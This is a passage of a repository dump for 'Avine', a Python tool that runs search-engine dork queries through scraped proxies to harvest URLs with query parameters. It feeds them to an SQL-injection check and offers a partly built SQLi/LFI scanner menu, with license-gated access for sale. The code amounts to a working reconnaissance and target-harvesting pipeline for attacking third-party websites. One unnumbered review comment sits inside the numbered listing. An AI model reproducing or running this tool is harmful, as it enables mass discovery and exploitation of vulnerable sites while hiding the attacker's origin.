if linkhost not in badlinks: 637 | dupe = 0 638 | counter = 0 639 | if '=' in link: 640 | Valid += 1 641 | badlinks.append(link) 642 | with open(r'results/rambler_links.txt', 'a') as File: 643 | File.write(link) + File.write('\n') 644 | sql(link) 645 | except: 646 | ProxyError+=1 647 | dorkparse = 0 648 | if engine == "Search": 649 | header = random.choice(headerz) 650 | url = f"https://www.search.com/web?q={urllib.parse.quote(dorklia)}" 651 | try: 652 | if proxytype != "Proxyless": 653 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 654 | else: 655 | response_2 = requests.get(url, headers=header, timeout=10) 656 | soup = BeautifulSoup(response_2.text, 'html.parser') 657 | TagList = soup.find_all("div", class_="web-result-title") 658 | for tag in TagList: 659 | Body = tag.find_all("a", class_="web-result-title-link") 660 | for Container in Body: 661 | badprox = 0 662 | link = Container['href'] 663 | Total_Found += 1 664 | threadn+=1 665 | if link not in Results: 666 | dupe+=1 667 | Duplicates = Total_Found - 
Valid 668 | Results.append(link) 669 | linkhost = link.split('.com')[0] 670 | if linkhost not in badlinks: 671 | dupe = 0 672 | counter = 0 673 | if '=' in link: 674 | Valid += 1 675 | badlinks.append(link) 676 | with open(r'results/search_links.txt', 'a') as File: 677 | File.write(link) + File.write('\n') 678 | sql(link) 679 | except: 680 | ProxyError+=1 681 | dorkparse = 0 682 | if engine == "Baidu": 683 | header = random.choice(headerz) 684 | url = f"https://www.baidu.com/s?wd={urllib.parse.quote(dorklia)}&rn=40&pn={first}" 685 | try: 686 | if proxytype != "Proxyless": 687 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 688 | else: 689 | response_2 = requests.get(url, headers=header, timeout=10) 690 | soup = BeautifulSoup(response_2.text, 'html.parser') 691 | TagList = soup.find_all('h3', class_="c-title t t tts-title") 692 | for tag in TagList: 693 | Body = tag.find_all('a') 694 | for Container in Body: 695 | badprox = 0 696 | link = Container['href'] 697 | Total_Found += 1 698 | threadn+=1 699 | if link not in Results: 700 | dupe+=1 701 | Duplicates = Total_Found - Valid 702 | Results.append(link) 703 | linkhost = link.split('.com')[0] 704 | if linkhost not in badlinks: 705 | dupe = 0 706 | counter = 0 707 | if '=' in link: 708 | Valid += 1 709 | badlinks.append(link) 710 | with open(r'results/baidu_links.txt', 'a') as File: 711 | File.write(link) + File.write('\n') 712 | sql(link) 713 | except: 714 | ProxyError+=1 715 | dorkparse = 0 716 | if engine == "Naver": 717 | header = random.choice(headerz) 718 | url = f"https://search.naver.com/search.naver?display=15&f=&filetype=0&page={first}&query={urllib.parse.quote(dorklia)}" 719 | try: 720 | if proxytype != "Proxyless": 721 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 722 | else: 723 | response_2 = requests.get(url, headers=header, timeout=10) 724 | soup = BeautifulSoup(response_2.text, 'html.parser') 725 | TagList = soup.find_all("div", class_="total_tit") 726 | for tag in TagList: 727 | Body = tag.find_all('a') 728 | for Container in Body: 729 | badprox = 0 730 | link = Container['href'] 731 | Total_Found += 1 732 | threadn+=1 733 | if link not in Results: 734 | dupe+=1 735 | Duplicates = Total_Found - Valid 736 | Results.append(link) 737 | linkhost = link.split('.net')[0] 738 | if linkhost not in badlinks: 739 | dupe = 0 740 | counter = 0 741 | if '=' in link: 742 | Valid += 1 743 | badlinks.append(link) 744 | with open(r'results/naver_links.txt', 'a') as File: 745 | File.write(link) + File.write('\n') 746 | sql(link) 747 | except: 748 | ProxyError+=1 749 | dorkparse = 0 750 | if engine == "Excite": 751 | header = random.choice(headerz) 752 | url = f"https://results.excite.com/serp?q={urllib.parse.quote(dorklia)}&page={first}" 753 | try: 754 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 755 | soup = BeautifulSoup(response_2.text, 'html.parser') 756 | TagList = soup.find_all("div", class_="web-bing__result") 757 | for tag in TagList: 758 | Body = tag.find_all('a') 759 | for Container in Body: 760 | badprox = 0 761 | link = Container['href'] 762 | Total_Found += 1 763 | threadn+=1 764 | if link not in Results: 765 | dupe+=1 766 | Duplicates = Total_Found - Valid 767 | Results.append(link) 768 | linkhost = link.split('.com')[0] 769 | if linkhost not in badlinks: 770 | dupe = 0 771 | counter = 0 772 | if '=' in link: 773 | Valid += 1 774 | badlinks.append(link) 775 | with open(r'results/excite_links.txt', 'a') as File: 776 | File.write(link) + 
File.write('\n') 777 | sql(link) 778 | except: 779 | ProxyError+=1 780 | dorkparse = 0 781 | except: 782 | Error+=1 783 | parse() 784 | threading.Thread(target=parse, args=()).start() 785 | if Total == dorklineint: 786 | print(logo) 787 | print() 788 | print(f"{green} Finished Getting URL's!{reset}") 789 | time.sleep(5) 790 | main2() 791 | 792 | def Drok(): 793 | global dorklia, droklist, linee, Error 794 | linee+=1 795 | try: 796 | with open(fileNameDork.name, 'r+', encoding='utf-8', errors='ignore') as e: 797 | ext = e.readlines() 798 | dorklia = ext[int(linee)].strip() 799 | except: 800 | Error+=1 801 | 802 | def parser2(): 803 | global proxylist, fileNameDork, dorkline, dorklineint, proxytype 804 | os.system('cls') 805 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Parser") 806 | print(logo) 807 | print() 808 | print(f"{magenta} Select Your Proxy Types:{reset}") 809 | print(f"\n {lightblue} [1] {lightmagenta}HTTP(S)\n {lightblue} [2] {lightmagenta}SOCKS4\n {lightblue} [3] {lightmagenta}SOCKS5\n {lightblue} [4] {lightmagenta}Proxyless") 810 | try: 811 | question = int(input("")) 812 | except Exception: 813 | print(f"{red}Invalid option{reset}") 814 | time.sleep(2) 815 | main2() 816 | if question == 1: 817 | proxytype = "https" 818 | elif question == 2: 819 | proxytype = "socks4" 820 | elif question == 3: 821 | proxytype = "socks5" 822 | elif question == 4: 823 | proxytype = "Proxyless" 824 | else: 825 | print(f"{red}Invalid option{reset}") 826 | time.sleep(2) 827 | main2() 828 | if proxytype != "Proxyless": 829 | os.system('cls') 830 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Parser") 831 | print(" Coded by KillinMachine") 832 | print(f" Select your proxies file ({proxytype})") 833 | fileNameProxy = filedialog.askopenfile(parent=root, mode='rb', title=f'Choose a {proxytype} Proxies File', 834 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 835 | if fileNameProxy is None: 836 | parser() 837 | else: 838 | try: 839 | with open(fileNameProxy.name, 'r+', encoding='utf-8', errors='ignore') as e: 840 | ext = e.readlines() 841 | for line in ext: 842 | try: 843 | proxyline = line.split()[0].replace('\n', '') 844 | proxylist.append(proxyline) 845 | except: 846 | pass 847 | print(f" Loaded [{len(proxylist)}] proxies lines.") 848 | time.sleep(2) 849 | except Exception: 850 | print("Your proxy file is probably harmed, please try again..") 851 | print(" Select your dork file") 852 | fileNameDork = filedialog.askopenfile(parent=root, mode='rb', title='Choose your dork file', 853 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 854 | if fileNameDork is None: 855 | parser() 856 | else: 857 | try: 858 | with open(fileNameDork.name, 'r+', encoding='utf-8', errors='ignore') as e: 859 | ext = e.readlines() 860 | for line in ext: 861 | try: 862 | dorkline = line.split()[0].replace('\n', '') 863 | dorklist.append(dorkline) 864 | except: 865 | pass 866 | print(f" Loaded [{len(dorklist)}] Dork lines.") 867 | time.sleep(2) 868 | except Exception: 869 | print("Your Dork file is probably harmed, please try again..") 870 | dorklineint = len(dorklist) 871 | os.system('cls') 872 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | Parsed dorks = {Total} | Total Found Links = {Total_Found} | Duplicates = {Duplicates} | Valid Links = {Valid} | Proxy Error = {ProxyError} | Error = {Error}") 873 | Drok() 874 | proxy() 875 | threading.Thread(target=parse, args=()).start() #i would just make this a for loop for people who want custom 
threads maybe in an update in 2050 :D 876 | threading.Thread(target=parse, args=()).start() 877 | threading.Thread(target=parse, args=()).start() 878 | threading.Thread(target=parse, args=()).start() 879 | threading.Thread(target=parse, args=()).start() 880 | threading.Thread(target=parse, args=()).start() 881 | threading.Thread(target=parse, args=()).start() #thats a lot 882 | 883 | def parser(): 884 | global engine, first 885 | os.system('cls') 886 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Parser") 887 | print(logo) 888 | print() 889 | print( f"{magenta} Pick a Search Engine{reset}" ) 890 | print(f"\n {lightblue}[1] {lightmagenta}Bing\n {lightblue}[2] {lightmagenta}Google\n {lightblue}[3] {lightmagenta}Yahoo\n {lightblue}[4] {lightmagenta}Ask\n {lightblue}[5] {lightmagenta}Rambler\n {lightblue}[6] {lightmagenta}Search\n {lightblue}[7] {lightmagenta}Baidu\n {lightblue}[8] {lightmagenta}Naver\n {lightblue}[9] {lightmagenta}Excite\n\n {lightblue}[0] {lightmagenta}Return") 891 | try: 892 | question = int(input("")) 893 | except Exception: 894 | print(f"{red}Invalid input{reset}") 895 | time.sleep(2) 896 | parser() 897 | if question == 1: 898 | engine = "Bing" 899 | parser2() 900 | elif question == 2: 901 | engine = "Google" 902 | parser2() 903 | elif question == 3: 904 | engine = "Yahoo" 905 | parser2() 906 | elif question == 4: 907 | engine = "Ask" 908 | parser2() 909 | elif question == 5: 910 | engine = "Rambler" 911 | parser2() 912 | elif question == 6: 913 | engine = "Search" 914 | parser2() 915 | elif question == 7: 916 | engine = "Baidu" 917 | parser2() 918 | elif question == 8: 919 | first = 2 920 | engine = "Naver" 921 | parser2() 922 | elif question == 9: 923 | engine = "Excite" 924 | parser2() 925 | elif question == 0: 926 | main2() 927 | else: 928 | print(f"{red}Invalid input{reset}") 929 | time.sleep(1) 930 | parser() 931 | 932 | def proxyscrapeScraper(proxytype, timeout, country, pathTextFile): 933 | response = requests.get("https://api.proxyscrape.com/?request=getproxies&proxytype=" + proxytype + "&timeout=" + timeout + "&country=" + country) 934 | proxies = response.text 935 | with open(pathTextFile, "a") as txt_file: 936 | txt_file.write(proxies) 937 | 938 | def proxyListDownloadScraper(url, type, anon, pathTextFile): 939 | session = requests.session() 940 | url = url + '?type=' + type + '&anon=' + anon 941 | html = session.get(url).text 942 | with open(pathTextFile, "a") as txt_file: 943 | for line in html.split('\n'): 944 | if len(line) > 0: 945 | txt_file.write(line + '\n') 946 | 947 | def makesoup(url): #i love to make soup 948 | page=requests.get(url) 949 | return BeautifulSoup(page.text,"html.parser") 950 | 951 | def proxyscrape(table): #just simple shit 952 | proxies = set() 953 | for row in table.findAll('tr'): 954 | countt = 0 955 | proxy = "" 956 | for cell in row.findAll('td'): 957 | if countt == 1: 958 | proxy += ":" + cell.text.replace(' ', '') 959 | proxies.add(proxy) 960 | break 961 | proxy += cell.text.replace(' ', '') 962 | countt += 1 963 | return proxies 964 | 965 | def scrapeproxies(url, pathTextFile): 966 | soup=makesoup(url) 967 | result = proxyscrape(table = soup.find('table', attrs={'class': 'table table-striped table-bordered'})) 968 | proxies = set() 969 | proxies.update(result) 970 | with open(pathTextFile, "a") as txt_file: 971 | for line in proxies: 972 | txt_file.write("".join(line) + "\n") 973 | 974 | def output(pathTextFile): 975 | try: 976 | with open(pathTextFile, 'r+', encoding='utf-8', errors='ignore') as txt_file:
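# In ProxyScrape() further below, output() is called immediately after the scraper threads are started, so the line
# count done here can run before those threads have finished writing; keeping the Thread objects and calling .join()
# on each one before counting would make the total reliable. Also note that the os.path.exists()/os.remove() branch
# below removes the freshly scraped proxy file right after it has been counted.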
977 | ext = txt_file.readlines() 978 | lineas = len(ext) 979 | if os.path.exists(pathTextFile): 980 | os.remove(pathTextFile) 981 | elif not os.path.exists(pathTextFile): 982 | with open(pathTextFile, 'w'): pass 983 | except: 984 | pass 985 | os.system('cls') 986 | print(logo) 987 | print() 988 | try: 989 | print(f''' {magenta}Finished Scraping Proxies! 990 | {yellow}[{cyan}{lineas}{yellow}]{lightblue} Proxies found!''') 991 | except: 992 | print(f" {magenta}Finished Scraping Proxies!") 993 | time.sleep(3) 994 | main2() 995 | 996 | def ProxyScrape(): #shit sources but still proxies 997 | global proxyType 998 | pathTextFile = [] 999 | os.system('cls') 1000 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | ProxyScrape") 1001 | print(logo) 1002 | print() 1003 | print(f"{magenta} Pick The Type Of Proxies You Would Like To Scrape:{reset}") 1004 | print(f"\n {lightblue} [1] {lightmagenta}HTTPS\n {lightblue} [2] {lightmagenta}HTTP\n {lightblue} [3] {lightmagenta}SOCKS\n {lightblue} [4] {lightmagenta}SOCKS4\n {lightblue} [5] {lightmagenta}SOCKS5\n\n {lightblue} [6] {lightmagenta}Return") 1005 | try: 1006 | question = int(input("")) 1007 | except Exception: 1008 | print(f"{red}Invalid option{reset}") 1009 | time.sleep(2) 1010 | ProxyScrape() 1011 | if question == 1: 1012 | proxyType = "https" 1013 | pathTextFile = "results/https_proxies.txt" 1014 | threading.Thread(target=scrapeproxies, args=('http://sslproxies.org',pathTextFile)).start() 1015 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'https', 'elite',pathTextFile)).start() 1016 | output(pathTextFile) 1017 | elif question == 2: 1018 | proxyType = "http" 1019 | pathTextFile = "results/http_proxies.txt" 1020 | threading.Thread(target=scrapeproxies, args=('http://free-proxy-list.net',pathTextFile)).start() 1021 | threading.Thread(target=scrapeproxies, args=('http://us-proxy.org',pathTextFile)).start() 1022 | threading.Thread(target=proxyscrapeScraper, args=('http','1000','All',pathTextFile)).start() 1023 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'elite',pathTextFile)).start() 1024 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'transparent',pathTextFile)).start() 1025 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'http', 'anonymous',pathTextFile)).start() 1026 | output(pathTextFile) 1027 | elif question == 3: 1028 | proxyType = "socks" 1029 | pathTextFile = "results/socks_proxies.txt" 1030 | threading.Thread(target=scrapeproxies, args=('http://socks-proxy.net',pathTextFile)).start() 1031 | threading.Thread(target=proxyscrapeScraper, args=('socks4','1000','All',pathTextFile)).start() 1032 | threading.Thread(target=proxyscrapeScraper, args=('socks5','1000','All',pathTextFile)).start() 1033 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',pathTextFile)).start() 1034 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',pathTextFile)).start() 1035 | output(pathTextFile) 1036 | elif question == 4: 1037 | proxyType = "socks4" 1038 | pathTextFile = "results/socks4_proxies.txt" 1039 | threading.Thread(target=proxyscrapeScraper, args=('socks4','1000','All',pathTextFile)).start() 1040 | threading.Thread(target=proxyListDownloadScraper, 
args=('https://www.proxy-list.download/api/v1/get', 'socks4', 'elite',pathTextFile)).start() 1041 | output(pathTextFile) 1042 | elif question == 5: 1043 | proxyType = "socks5" 1044 | pathTextFile = "results/socks5_proxies.txt" 1045 | threading.Thread(target=proxyscrapeScraper, args=('socks5','1000','All',pathTextFile)).start() 1046 | threading.Thread(target=proxyListDownloadScraper, args=('https://www.proxy-list.download/api/v1/get', 'socks5', 'elite',pathTextFile)).start() 1047 | output(pathTextFile) 1048 | elif question == 6: 1049 | main2() 1050 | else: 1051 | print(f"{red}Invalid option{reset}") 1052 | time.sleep(2) 1053 | ProxyScrape() 1054 | 1055 | def vuln(): #never finished vuln scanners 1056 | global fileNameUrl, linee, counter 1057 | linee = 0 1058 | counter = 0 1059 | os.system('cls') 1060 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570 | Vulnerability Scanner") 1061 | print(logo) 1062 | print() 1063 | print(f"{magenta} What kind of vulnerability do you want to scan for?{reset}") 1064 | print(f"\n {lightblue} [1] {lightmagenta}SQLI\n {lightblue} [2] {lightmagenta}LFI\n\n {lightblue} [3] {lightmagenta}Return") 1065 | try: 1066 | question = int(input("")) 1067 | except Exception: 1068 | print(f"{red}Invalid option{reset}") 1069 | time.sleep(2) 1070 | vuln() 1071 | if question == 1: 1072 | os.system('cls') 1073 | print(logo) 1074 | print() 1075 | print(f"\n {lightblue} [1] {lightmagenta}Save Payload\n {lightblue} [2] {lightmagenta}Dont Save Payload\n\n {lightblue} [3] {lightmagenta}Return") 1076 | try: 1077 | question = int(input("")) 1078 | except Exception: 1079 | print(f"{red}Invalid option{reset}") 1080 | time.sleep(2) 1081 | vuln() 1082 | if question == 1: 1083 | savepayload = "true" 1084 | if question == 2: 1085 | savepayload = "false" 1086 | if question == 3: 1087 | vuln() 1088 | os.system('cls') 1089 | print(logo) 1090 | print() 1091 | print(f" Select your urls!") 1092 | fileNameUrl = filedialog.askopenfile(parent=root, mode='rb', title=f'Choose your urls', 1093 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 1094 | if fileNameUrl is None: 1095 | vuln() 1096 | else: 1097 | try: 1098 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 1099 | ext = e.readlines() 1100 | for line in ext: 1101 | try: 1102 | urlline = line.split()[0].replace('\n', '') 1103 | urllist.append(urlline) 1104 | except: 1105 | pass 1106 | print(f" Loaded [{len(urllist)}] url's") 1107 | time.sleep(2) 1108 | except Exception: 1109 | print("Your urls file is probably harmed, please try again..") 1110 | vulnscan() 1111 | elif question == 2: 1112 | os.system('cls') 1113 | print(logo) 1114 | print() 1115 | print(f"\n {lightblue} [1] {lightmagenta}Save Path\n {lightblue} [2] {lightmagenta}Dont Save Path\n\n {lightblue} [3] {lightmagenta}Return") 1116 | try: 1117 | question = int(input("")) 1118 | except Exception: 1119 | print(f"{red}Invalid option{reset}") 1120 | time.sleep(2) 1121 | vuln() 1122 | if question == 1: 1123 | savepayload = "true" 1124 | if question == 2: 1125 | savepayload = "false" 1126 | if question == 3: 1127 | vuln() 1128 | os.system('cls') 1129 | print(logo) 1130 | print() 1131 | print(f" Select your your urls") 1132 | fileNameUrl = filedialog.askopenfile(parent=root, mode='rb', title=f'Choose your urls', 1133 | filetype=(("txt", "*.txt"), ("All files", "*.txt"))) 1134 | if fileNameUrl is None: 1135 | vuln() 1136 | else: 1137 | try: 1138 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 1139 | ext = 
e.readlines() 1140 | for line in ext: 1141 | try: 1142 | urlline = line.split()[0].replace('\n', '') 1143 | urllist.append(urlline) 1144 | except: 1145 | pass 1146 | print(f" Loaded [{len(urllist)}] url's") 1147 | time.sleep(2) 1148 | except Exception: 1149 | print("Your urls file is probably harmed, please try again..") 1150 | lfiscan() 1151 | elif question == 2: 1152 | vuln() 1153 | else: 1154 | print(f"{red}Invalid option{reset}") 1155 | time.sleep(2) 1156 | vuln() 1157 | 1158 | def verify_hmac(raw_body, client_signature: str, hmac_secret: bytes) -> bool: 1159 | computed_sha = hmac.new(hmac_secret, 1160 | raw_body, 1161 | digestmod=hashlib.sha256).hexdigest() 1162 | return computed_sha == client_signature 1163 | 1164 | def main2(): #was once main but then i realized i needed an auth if i wanted to sell but its pointless now 1165 | os.system('cls') 1166 | print(logo) 1167 | print() 1168 | print(f"{magenta} Pick an option:{reset}") 1169 | print(f"\n {lightblue} [1] {lightmagenta}Parser\n {lightblue} [2] {lightmagenta}ProxyScrape\n {lightblue} [3] {lightmagenta}Vuln Check") 1170 | try: 1171 | question = int(input("")) 1172 | except Exception: 1173 | print(f"{red}Invalid option{reset}") 1174 | time.sleep(2) 1175 | main2() 1176 | if question == 1: 1177 | parser() 1178 | elif question == 2: 1179 | ProxyScrape() 1180 | elif question == 3: 1181 | vuln() 1182 | else: 1183 | print(f"{red}Invalid option{reset}") 1184 | time.sleep(2) 1185 | main2() 1186 | 1187 | def main(): #if anyone skids avine your welcome for this 1188 | if not os.path.exists('results'): 1189 | os.makedirs('results') 1190 | os.system('cls') 1191 | ctypes.windll.kernel32.SetConsoleTitleW("Avine By KillinMachine#2570") 1192 | print(logo) 1193 | print() 1194 | print(f"{magenta} Pick an option:{reset}") 1195 | print(f"\n {lightblue} [1] {lightmagenta}Login\n {lightblue} [2] {lightmagenta}Reset HWID\n {lightblue} [3] {lightmagenta}Credits\n {lightblue} [4] {lightmagenta}Main (select this to get to the program)") 1196 | try: 1197 | question = int(input("")) 1198 | except Exception: 1199 | print(f"{red}Invalid option{reset}") 1200 | time.sleep(2) 1201 | main() 1202 | if question == 1: 1203 | try: 1204 | os.system('cls') 1205 | print(logo) 1206 | print() 1207 | secret = b"your hmac client secret" 1208 | hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip() 1209 | print(f"{magenta} Enter your username:{reset}") 1210 | username = (input(" ")) 1211 | print(f"{magenta} Enter your password:{reset}") 1212 | password = (input(" ")) 1213 | aid = "your aid" 1214 | api_key = "your api key" 1215 | nonce = random.randint(1000000000, 1000000000000) 1216 | payload = {"username": username, "password": password, "hwid": hwid, "aid": aid, "key": api_key, "nonce": nonce} 1217 | h = hmac.new(secret, json.dumps(payload).encode("utf-8"), digestmod=hashlib.sha256).hexdigest() 1218 | r = requests.post("http://api.ccauth.app/api/v4/authenticate", headers={"X-CCAuth-Signature": h}, json=payload) #chanchan auth https://github.com/chanchan69/VegetablesAuth.py 1219 | is_verified = verify_hmac(r.text.encode(), r.headers["X-CCAuth-Signature"], secret) 1220 | r = r.json() 1221 | if r["success"] and r["nonce"] == nonce: 1222 | if is_verified: 1223 | if not r["licenseInfo"]["expired"]: 1224 | os.system('cls') 1225 | print(logo) 1226 | print() 1227 | print(f"{magenta} Authenticated") 1228 | time.sleep(1) 1229 | main2() 1230 | else: 1231 | os.system('cls') 1232 | print(logo) 1233 | print() 1234 | print(f"{red} Your License has 
expired.") 1235 | time.sleep(4) 1236 | sys.exit 1237 | else: 1238 | os.system('cls') 1239 | print(logo) 1240 | print() 1241 | print(f"{red} Invalid hmac sig") 1242 | time.sleep(2) 1243 | main() 1244 | else: 1245 | if r["errorDetails"]["type"] == "credentials": 1246 | os.system('cls') 1247 | print(logo) 1248 | print() 1249 | print(f"{red} Invalid Username/Password") 1250 | time.sleep(2) 1251 | main() 1252 | elif r["errorDetails"]["type"] == "hwid": 1253 | os.system('cls') 1254 | print(logo) 1255 | print() 1256 | print(f"{red} Invalid HWID") 1257 | time.sleep(2) 1258 | main() 1259 | else: 1260 | os.system('cls') 1261 | print(logo) 1262 | print() 1263 | print(r["errorDetails"]["type"]) 1264 | time.sleep(3) 1265 | sys.exit 1266 | except: 1267 | os.system('cls') 1268 | print(logo) 1269 | print() 1270 | print(f"{red} There was an error!") 1271 | time.sleep(5) 1272 | main() 1273 | elif question == 2: 1274 | try: 1275 | secret = b"your hmac client secret" 1276 | hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip() 1277 | print(f"{magenta} Enter your username:{reset}") 1278 | username = (input(" ")) 1279 | print(f"{magenta} Enter your password:{reset}") 1280 | password = (input(" ")) 1281 | aid = "your aid" 1282 | api_key = "your api key" 1283 | print(f"{magenta} Enter your Reset Key:{reset}") 1284 | reset_key = (input(" ")) 1285 | payload = {"username": username, "password": password, "hwid": hwid, "aid": aid, "key": api_key, "resetKey": reset_key} 1286 | h = hmac.new(secret, json.dumps(payload).encode("utf-8"), digestmod=hashlib.sha256).hexdigest() 1287 | r = requests.post("http://127.0.0.1:5000/api/v4/reset", headers={"X-CCAuth-Signature": h}, json=payload) 1288 | is_verified = verify_hmac(r.text.encode(), r.headers["X-CCAuth-Signature"], secret) 1289 | r = r.json() 1290 | if r["success"]: 1291 | if is_verified: 1292 | print(f"{magenta} Your HWID has been reset!") 1293 | time.sleep(1) 1294 | main() 1295 | else: 1296 | print(f"{red} Invalid hmac") 1297 | else: 1298 | if r["errorDetails"]["type"] == "invalid key": 1299 | os.system('cls') 1300 | print(logo) 1301 | print() 1302 | print(f"{red} Invalid Reset Key!") 1303 | time.sleep(3) 1304 | main() 1305 | elif r["errorDetails"]["type"] == "settings": 1306 | os.system('cls') 1307 | print(logo) 1308 | print() 1309 | print(f"{red} HWID Resets are disabled!") 1310 | time.sleep(3) 1311 | main() 1312 | elif r["errorDetails"]["type"] == "reseting too fast": 1313 | os.system('cls') 1314 | print(logo) 1315 | print() 1316 | print(f"{red} Your HWID has been reset in the last 24 hours!") 1317 | time.sleep(3) 1318 | main() 1319 | else: 1320 | os.system('cls') 1321 | print(logo) 1322 | print() 1323 | print(f" Failed with error:") 1324 | print(r["errorDetails"]["type"]) 1325 | except: 1326 | os.system('cls') 1327 | print(logo) 1328 | print() 1329 | print(f"{red} There was an error!") 1330 | time.sleep(5) 1331 | main() 1332 | if question == 3: 1333 | os.system('cls') 1334 | print(logo) 1335 | print() 1336 | print(f''' {magenta}Credits: 1337 | {lightblue}Made By{yellow}: {cyan}KillinMachine#2570 1338 | {lightblue}Discord{yellow}: {cyan}discord.gg/txytskBP3s 1339 | 1340 | {magenta}Press enter to go back.''') 1341 | if (input("")): 1342 | main() 1343 | elif question == 4: 1344 | main2() 1345 | else: 1346 | print(f"{red}Invalid option{reset}") 1347 | time.sleep(2) 1348 | main() 1349 | main() 1350 | -------------------------------------------------------------------------------- /pictures/engines.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/engines.png -------------------------------------------------------------------------------- /pictures/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/login.png -------------------------------------------------------------------------------- /pictures/modules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/modules.png -------------------------------------------------------------------------------- /pictures/parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/parser.png -------------------------------------------------------------------------------- /pictures/sqliscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MachineKillin/Avine/f870d5d95cf1c485cce1b9dfeeb0df376750fa0a/pictures/sqliscan.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | altgraph==0.17.2 2 | beautifulsoup4==4.11.1 3 | bs4==0.0.1 4 | certifi==2022.5.18.1 5 | charset-normalizer==2.0.12 6 | colorama==0.4.4 7 | future==0.18.2 8 | idna==3.3 9 | Nuitka==0.9.6 10 | pefile==2022.5.30 11 | psutil==5.9.1 12 | pyarmor==7.5.1 13 | pyinstaller==5.2 14 | pyinstaller-hooks-contrib==2022.8 15 | pypresence==4.2.1 16 | pywin32-ctypes==0.2.0 17 | requests==2.27.1 18 | soupsieve==2.3.2.post1 19 | urllib3==1.26.9 20 | -------------------------------------------------------------------------------- /results/results here.txt: -------------------------------------------------------------------------------- 1 | i hope you starred my project on github bc those are like social credits to me ngl and if i don't have enough my government will find me (I'm blinking twice pls save me and star 2 | my project thanks) --------------------------------------------------------------------------------